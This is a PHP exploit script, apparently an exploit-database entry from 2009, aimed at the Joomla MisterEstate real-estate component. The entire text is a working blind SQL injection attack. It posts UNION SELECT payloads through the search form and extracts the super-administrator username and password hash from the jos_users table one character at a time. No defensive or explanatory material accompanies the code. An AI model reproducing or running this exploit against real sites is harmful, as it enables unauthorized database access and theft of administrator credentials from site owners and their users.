Joomla Component MisterEstate Blind SQL Injection Exploit'; // ini_set( "memory_limit", "512M" ); ini_set( "max_execution_time", 0 ); set_time_limit( 0 ); if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?' ); $url = "http://".$_GET['url']."/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component"; $data = array(); $data['src_cat'] = 0; $data['country'] = 'no'; $data['state'] = 'no'; $data['town'] = 'no'; $data['district'] = 'no'; $data['mesearch'] = 'Start Search'; $admin = ''; $output = getData( "1%') AND 1=2 UNION SELECT id FROM jos_users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '" ); if( !testData( $output ) ) die('failed'); echo '
Check passed... trying exploit...

'; for( $i=0;$i<250;$i++ ) { for( $j=48; $j<126; $j++ ) { $output = getData( "1%') AND 1=2 UNION SELECT id FROM jos_users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,password),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" ); if( testData( $output ) ) { ob_end_clean(); $admin .= chr( $j ); echo "Found character $i : buffer is now $admin
"; } ob_end_clean(); } } echo "

All done!

"; echo "


"; function shutUp( $buffer ) { return false; } function testData( $output ) { /* feel free to add other translations as needed */ $reg = array( '/Your\ search\ produced\ 1\ hits/', '/Su\ busqueda\ ha\ encontrado\ 1\ aciertos/' ); foreach( $reg as $r ) if( preg_match( $r, $output ) ) return TRUE; return FALSE; } function getData( $string ) { global $data, $url; $data['searchstring'] = $string; ob_start( "shutUp" ); $ch = curl_init(); curl_setopt( $ch, CURL_TIMEOUT, 120 ); curl_setopt( $ch, CURL_RETURNTRANSFER, 0 ); curl_setopt( $ch, CURLOPT_URL, $url ); if( count( $data ) > 0 ) { curl_setopt( $ch, CURLOPT_POST, count( $data ) ); curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) ); } curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 ); $result = curl_exec( $ch ); curl_close( $ch ); return ob_get_contents(); } /* jdc 2009 */